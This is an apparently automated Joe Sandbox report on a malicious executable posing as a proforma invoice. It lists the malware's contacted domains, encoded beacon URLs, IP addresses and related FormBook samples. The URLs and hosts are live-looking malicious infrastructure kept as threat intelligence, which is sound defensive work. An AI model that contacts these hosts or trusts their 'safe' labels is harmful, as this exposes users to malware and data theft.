http://www.43kdd.top/p3j6/?bV=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPKWG5WAS3psYmnqJIK+9TxAzVw33X+qLRjr2nQR0/ahQ8dw==&wzcP=iLdd | 0% | Avira URL Cloud | safe |
http://www.jcsa.info/hxi5/?bV=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzECOhz/eBMNQtzbXvy0GcsSmUnEXx6wmc7on4m5IV1LddeYQ==&wzcP=iLdd | 0% | Avira URL Cloud | safe |
http://www.jcsa.info/__media__/js/trademark.php?d=jcsa.info&type=dflt | 0% | Avira URL Cloud | safe |
http://www.madhf.tech/3iym/?bV=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBY | 0% | Avira URL Cloud | safe |
http://www.yc791022.asia/31pt/ | 0% | Avira URL Cloud | safe |
http://www.jcsa.info/Business_Degrees.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR12xV | 0% | Avira URL Cloud | safe |
http://www.rgenerousrs.store/8gp4/ | 0% | Avira URL Cloud | safe |
http://www.43kdd.top/p3j6/ | 0% | Avira URL Cloud | safe |
https://zkdamdjj.shop/swhs/?bV=8xf1FTtyUpYkrTYPPLWUAP | 0% | Avira URL Cloud | safe |
http://www.zkdamdjj.shop/swhs/ | 0% | Avira URL Cloud | safe |
http://www.1secondlending.one/j8pv/ | 0% | Avira URL Cloud | safe |
http://www.register.com?trkID=WSTm3u15CW | 0% | Avira URL Cloud | safe |
http://www.optimismbank.xyz/98j3/?bV=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbelSKgrKC4QuJZGFDN8wI4iJ7kAaJbEHf+I5C8wBrJZeg==&wzcP=iLdd | 0% | Avira URL Cloud | safe |
http://www.xcvbj.asia/hkgx/ | 0% | Avira URL Cloud | safe |
http://www.laohub10.net/n2c9/?bV=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/MvpOFGl3CcQklZlekjGrp+0XQqfczBPHNrv5hMhkDFTE+A==&wzcP=iLdd | 0% | Avira URL Cloud | safe |
http://www.thaor56.online/fev0/?wzcP=iLdd&bV=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKn/SU+87cwr0VJj825LSMeKmzjVPSaMyWz8le8KSNg+oL/g== | 0% | Avira URL Cloud | safe |
https://www.register.com/whois.rcmx?domainName=Jcsa.info | 0% | Avira URL Cloud | safe |
http://www.zkdamdjj.shop/swhs/?bV=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTQ0tlUhCAXdO2W2lcbMXoQ37jkanwSyGhs5UT/ITwg7la8g==&wzcP=iLdd | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.bankseedz.info | 46.30.211.38 | true | true | | unknown
www.optimismbank.xyz | 13.248.169.48 | true | true | | unknown
www.madhf.tech | 103.224.182.242 | true | false | | high
r0lqcud7.nbnnn.xyz | 202.79.161.151 | true | false | | high
www.xcvbj.asia | 149.88.81.190 | true | false | | high
bpgroup.site | 74.48.143.82 | true | true | | unknown
43kdd.top | 38.47.232.202 | true | true | | unknown
thaor56.online | 202.92.5.23 | true | true | | unknown
www.1secondlending.one | 43.205.198.29 | true | false | | high
www.zkdamdjj.shop | 172.67.187.114 | true | false | | high
www.rgenerousrs.store | 172.67.167.146 | true | false | | high
www.jcsa.info | 208.91.197.39 | true | true | | unknown
www.yc791022.asia | 101.35.209.183 | true | false | | high
www.greenthub.life | 209.74.77.109 | true | true | | unknown
www.bpgroup.site | unknown | unknown | false | | unknown
www.43kdd.top | unknown | unknown | false | | unknown
www.laohub10.net | unknown | unknown | false | | high
www.thaor56.online | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.bankseedz.info/uf7y/ | true | Avira URL Cloud: safe | unknown
http://www.madhf.tech/3iym/ | true | Avira URL Cloud: safe | unknown
http://www.jcsa.info/hxi5/ | true | Avira URL Cloud: safe | unknown
http://www.rgenerousrs.store/8gp4/?bV=FEeZWlhMd48ysDs290a5kdk4wKu/Usks8a8x1+EEc0Vq+hoQB7y77HQo5oow9pdvGKqyyoz5OAo+pUm014OHEU2GNEJ4iSl/EJTCwnsfNhVKTNH/IB8Mre+zSk1Y9E9ALA==&wzcP=iLdd | true | Avira URL Cloud: safe | unknown
http://www.greenthub.life/r3zg/ | true | Avira URL Cloud: safe | unknown
http://www.1secondlending.one/j8pv/?bV=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b7jwAWfgjYo1ceHXmQsmagjo2PVHkyEcMWf8OCye8gCuDoA==&wzcP=iLdd | true | Avira URL Cloud: safe | unknown
http://www.greenthub.life/r3zg/?bV=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT06b5FqqYL9BGdKsZ2rM8t/H5MOkDBuj8Escbc06JqN3wYtw==&wzcP=iLdd | true | Avira URL Cloud: safe | unknown
http://www.laohub10.net/n2c9/ | true | Avira URL Cloud: safe | unknown
http://www.madhf.tech/3iym/?bV=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZu44boXAwOrdyhUlC/OJ4E8YsdUb7oGGCmNRhxxg5yFhA==&wzcP=iLdd | true | Avira URL Cloud: safe | unknown
http://www.bankseedz.info/uf7y/?bV=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7gow9os+aP1J4EzwTxXBX+A+Fa6CXCkfj46dm/6YpVTzCxw==&wzcP=iLdd | true | Avira URL Cloud: safe | unknown
http://www.yc791022.asia/31pt/?bV=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/X0tkqytLQfQBhcOdFFeEx3iaXLjcxC54/kiaY/bAFrqB8g==&wzcP=iLdd | true | Avira URL Cloud: safe | unknown
http://www.optimismbank.xyz/98j3/ | true | Avira URL Cloud: safe | unknown
http://www.jcsa.info/hxi5/?bV=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzECOhz/eBMNQtzbXvy0GcsSmUnEXx6wmc7on4m5IV1LddeYQ==&wzcP=iLdd | true | Avira URL Cloud: safe | unknown
http://www.43kdd.top/p3j6/?bV=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPKWG5WAS3psYmnqJIK+9TxAzVw33X+qLRjr2nQR0/ahQ8dw==&wzcP=iLdd | true | Avira URL Cloud: safe | unknown
http://www.43kdd.top/p3j6/ | true | Avira URL Cloud: safe | unknown
http://www.rgenerousrs.store/8gp4/ | true | Avira URL Cloud: safe | unknown
http://www.yc791022.asia/31pt/ | true | Avira URL Cloud: safe | unknown
http://www.zkdamdjj.shop/swhs/ | true | Avira URL Cloud: safe | unknown
http://www.optimismbank.xyz/98j3/?bV=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbelSKgrKC4QuJZGFDN8wI4iJ7kAaJbEHf+I5C8wBrJZeg==&wzcP=iLdd | true | Avira URL Cloud: safe | unknown
http://www.laohub10.net/n2c9/?bV=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/MvpOFGl3CcQklZlekjGrp+0XQqfczBPHNrv5hMhkDFTE+A==&wzcP=iLdd | true | Avira URL Cloud: safe | unknown
http://www.xcvbj.asia/hkgx/ | true | Avira URL Cloud: safe | unknown
http://www.thaor56.online/fev0/?wzcP=iLdd&bV=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKn/SU+87cwr0VJj825LSMeKmzjVPSaMyWz8le8KSNg+oL/g== | true | Avira URL Cloud: safe | unknown
http://www.1secondlending.one/j8pv/ | true | Avira URL Cloud: safe | unknown
http://www.zkdamdjj.shop/swhs/?bV=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTQ0tlUhCAXdO2W2lcbMXoQ37jkanwSyGhs5UT/ITwg7la8g==&wzcP=iLdd | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff | waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://dts.gnpge.com | nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.jcsa.info/College_Information.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR1 | waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/pics/28903/search.png) | waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://cdn.consentmanager.net | waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.rgenerousrs.store | nfGtWoQBhJSQ.exe, 00000006.00000002.4471509831.0000000004A8A000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jcsa.info/Education_Seminars.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR12 | waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.Jcsa.info | waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf | waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmp | false | | high
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2 | waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf | waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmp | false | | high
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix | waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmp | false | | high
http://www.jcsa.info/Education_Grant.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR12xVM | waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jcsa.info/University_of_Toronto.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHs | waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmp | false
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              high
                                                                              https://delivery.consentmanager.netwaitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.register.com/?trkID=WSTm3u15CWwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://i3.cdn-image.com/__media__/pics/29590/bg1.png)waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icowaitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.jcsa.info/display.cfmwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.jcsa.info/Business_Degrees.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkeHsR12xVwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.madhf.tech/3iym/?bV=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYnfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000031AE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.jcsa.info/__media__/js/trademark.php?d=jcsa.info&type=dfltwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.ecosia.org/newtab/waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://i3.cdn-image.com/__media__/pics/8934/rcomlogo.jpgwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://ac.ecosia.org/autocomplete?q=waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://zkdamdjj.shop/swhs/?bV=8xf1FTtyUpYkrTYPPLWUAPwaitfor.exe, 00000005.00000002.4470341771.000000000643A000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.0000000003B1A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.register.com?trkID=WSTm3u15CWwaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.register.com/whois.rcmx?domainName=Jcsa.infowaitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://i3.cdn-image.com/__media__/js/min.js?v2.3waitfor.exe, 00000005.00000002.4472031656.0000000007910000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4470341771.0000000006116000.00000004.10000000.00040000.00000000.sdmp, nfGtWoQBhJSQ.exe, 00000006.00000002.4469771241.00000000037F6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=waitfor.exe, 00000005.00000003.2490584136.0000000007BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1566688
Start date and time: 2024-12-02 15:22:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Proforma invoice - Arancia NZ.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@16/13
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 48
• Number of non-executed functions: 274
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target nfGtWoQBhJSQ.exe, PID 4580 because it is empty
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Proforma invoice - Arancia NZ.exe
Time: 09:23:59
Type: API Interceptor
Description: 9667529x Sleep call for process: waitfor.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context

Match: 209.74.77.109
A2028041200SD.exe | Get hash | malicious | FormBook | Browse | www.dailyfuns.info/n9b0/
W3MzrFzSF0.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | www.gogawithme.live/6gtt/
DO-COSU6387686280.pdf.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | www.futuru.xyz/8uep/
PAYROLL LIST.exe | Get hash | malicious | FormBook | Browse | www.greenthub.life/r3zg/
file.exe | Get hash | malicious | FormBook | Browse | www.moviebuff.info/4r26/
PO #2411071822.exe | Get hash | malicious | FormBook | Browse | www.gogawithme.live/6gtt/
Quotation.exe | Get hash | malicious | FormBook | Browse | www.gogawithme.live/6gtt/
payments.exe | Get hash | malicious | FormBook | Browse | www.gogawithme.live/6gtt/
A2028041200SD.exe | Get hash | malicious | FormBook | Browse | www.dailyfuns.info/n9b0/

Match: 13.248.169.48
lKvXJ7VVCK.exe | Get hash | malicious | FormBook | Browse | www.avalanchefi.xyz/ctta/
BASF Hungária Kft.exe | Get hash | malicious | FormBook | Browse | www.tals.xyz/k1td/
PAYMENT_ADVICE.exe | Get hash | malicious | FormBook | Browse | www.heliopsis.xyz/69zn/
1k24tbb-00241346.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | www.gupiao.bet/t3a1/
Documents.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | www.hasan.cloud/tur7/
CV_ Filipa Barbosa.exe | Get hash | malicious | FormBook | Browse | www.egyshare.xyz/lp5b/
attached order.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | www.aktmarket.xyz/wb7v/
file.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | www.gupiao.bet/t3a1/
